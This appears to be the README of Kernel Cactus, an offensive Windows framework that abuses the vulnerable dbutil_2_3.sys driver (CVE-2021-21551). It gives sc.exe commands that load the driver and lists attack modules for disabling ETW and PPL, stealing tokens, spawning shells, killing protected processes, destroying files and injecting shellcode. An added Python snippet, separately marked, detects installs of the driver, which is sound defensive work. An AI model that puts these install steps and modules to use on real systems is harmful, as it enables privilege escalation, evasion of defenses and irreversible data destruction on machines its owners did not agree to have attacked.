Kernel-Cactus

It's pointy and it hurts!

Kernel Cactus is a framework written in C for performing attacks on Windows by exploiting CVE-2021-21551 (dbutil_2_3.sys).

Description

Please read our full article to further understand the ins and outs of all the offensive and defensive code in this repo.

Pre-Reqs

For Kernel Cactus to work, dbutil_2_3.sys must be installed and its service started. How you do that is your choice: anything from sc.exe to third-party driver loaders works. For example:

sc.exe create dbutil_2_3 binpath= C:\path\to\dbutil_2_3.sys type= filesys

sc.exe start dbutil_2_3
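
For defenders, the install step above leaves a recognisable process-creation command line. The following is an added example, not code from the Kernel Cactus repository: it parses `sc create` command lines and flags those that register dbutil_2_3.sys as a driver service. The function names are hypothetical and the sample command lines are constructed.

```python
import ntpath
import re

VULN_DRIVER = "dbutil_2_3.sys"         # driver file name taken from this page
DRIVER_TYPES = {"kernel", "filesys"}   # sc.exe service types that load a driver

# `sc[.exe] [\\server] create <name> <options>`, with an optional path before sc
SC_CREATE = re.compile(
    r'^\s*"?(?:[^"\s]*\\)?sc(?:\.exe)?"?\s+(?:\\\\\S+\s+)?create\s+("[^"]+"|\S+)(.*)$',
    re.IGNORECASE)
# sc.exe options are written `key= value`; the value may be quoted
OPTION = re.compile(r'(\w+)=\s*("[^"]*"|\S+)')

def parse_sc_create(cmdline):
    """Return (service_name, options) for an `sc create` command line, else None."""
    m = SC_CREATE.match(cmdline)
    if not m:
        return None
    opts = {k.lower(): v.strip('"') for k, v in OPTION.findall(m.group(2))}
    return m.group(1).strip('"'), opts

def flag_driver_install(cmdline):
    """Flag a driver-type service whose image is the vulnerable driver file."""
    parsed = parse_sc_create(cmdline)
    if parsed is None:
        return None
    name, opts = parsed
    # Match on the image file name, not the service name, which is caller-chosen.
    image = ntpath.basename(opts.get("binpath", "")).lower()
    svc_type = opts.get("type", "").lower()
    if svc_type in DRIVER_TYPES and image == VULN_DRIVER:
        return {"service": name, "binpath": opts["binpath"], "type": svc_type}
    return None

def scan(cmdlines):
    """Return one finding per command line that installs the driver."""
    return [hit for line in cmdlines if (hit := flag_driver_install(line))]

# Constructed process-creation command lines (not real telemetry)
SAMPLE = [
    r"sc.exe create dbutil_2_3 binpath= C:\path\to\dbutil_2_3.sys type= filesys",
    r'C:\Windows\System32\sc.exe CREATE updater binPath= "C:\Users\Public\Drivers Tmp\DBUtil_2_3.sys" type= kernel',
    r"sc.exe create backupagent binpath= C:\tools\agent.exe type= own",
    r"sc.exe start dbutil_2_3",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print("ALERT vulnerable driver service:", hit)
```

A file-name match misses a renamed copy of the driver, so treat this as a first-pass rule alongside hash-based driver blocking.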

Disclaimer

This is a new framework, still mostly at PoC level, for abusing CVE-2021-21551. As such, it tampers with dangerous variables in the kernel, which may cause a BSOD from time to time. USING THIS IN A PRODUCTION ENVIRONMENT IS RISKY! Use it with all the caution you can! Fixes to stabilize possible BSODs will come in the next update, although it is mostly safe to use at the moment. If you are not familiar with the nature of this CVE, please refer to https://spikysabra.gitbook.io/kernelcactus/.

Offsets

To use KernelCactus.exe you must first extract the offsets of your Ntoskrnl.exe. To do so, we have included the Radare debugger and a Python script. First copy the contents of Radare to your desired path, and add that path to the PATH environment variable.

After that, use the Python script like so:

python offsetExtract.py -i <your exe> 

After you receive your CSV file, place it in the same directory as KernelCactus.exe and run it :)

Usage

--help								Display usage 

--etw 0/1							Disable/Enable ETW

--ppl PID 0/1							Disable/Enable PPL from any process 

--terminate	PID						Terminate single Process:
								this is aimed mostly for protected processes. 
								but will work for any process that provides you with PROCESS_QUERY_LIMITED_INFORMATION in its ACL.
							        (in case you do not hold such a right, you are more than welcome to use '--token PID current --terminate PID' in order to receive one :D )

--delete PATH							Delete any file that provides you with ANY handle access ;)


--token srcPID dstPID						copy a token via kernel from one process to another. works both on local AND domain purposes ;)
								(use 'current' on dstPID in order to change the current process token)

--tokenspawn PID						spawn a new CMD shell with the chosen process token.						

--destroyservice path\to\pids.txt path\to\files.txt		WARNING, USE WITH RESPONSIBILITY!
								ALL FILES DELETED ARE NOT RESTORABLE, MAKE A COPY PRIOR TO DELETING IF YOU NEED TO...
								Will kill all processes in pid list (line separated) 
								Will delete all Files in the File list (line separated)
								this module is aimed for services that own a WatchDog service. 
								deleting and killing all files is only in case that the lowest handle access
								is available to you by ACL, so again feel free to use --token to elevate privs. 

--tinject PID \path\to\shellcode				Perform RemoteThreadInjection to any process that provides you ANY handle, including protected processes 

--thijack PID \path\to\shellcode				Perform ThreadHijacking via kernel operations to any process that provides you ANY handle, including protected processes 
									
(shellcode must be in binary format)

Authors

Itamar Medyoni (@T045T3) Matan Haim Guez (@0xs0ns3)

TODO

Honorable Mentions